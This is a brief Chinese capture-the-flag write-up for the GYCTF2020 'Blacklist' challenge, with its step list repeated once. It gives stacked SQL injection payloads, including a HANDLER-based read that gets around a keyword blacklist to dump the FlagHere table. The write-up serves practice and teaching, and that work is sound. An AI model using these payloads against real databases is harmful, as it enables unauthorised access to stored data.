[GYCTF2020]Blacklist
报错,可能是sql
字符型注入
测试列数有2列
正则过滤了一些关键字
尝试堆叠注入
查数据库
查表
查列名1';show columns from FlagHere; #
查列的内容1';handler FlagHere open;handler FlagHere read first;#
报错,可能是sql
字符型注入
测试列数有2列
正则过滤了一些关键字
尝试堆叠注入
查数据库
查表
查列名1';show columns from FlagHere; #
查列的内容1';handler FlagHere open;handler FlagHere read first;#
浙公网安备 33010602011771号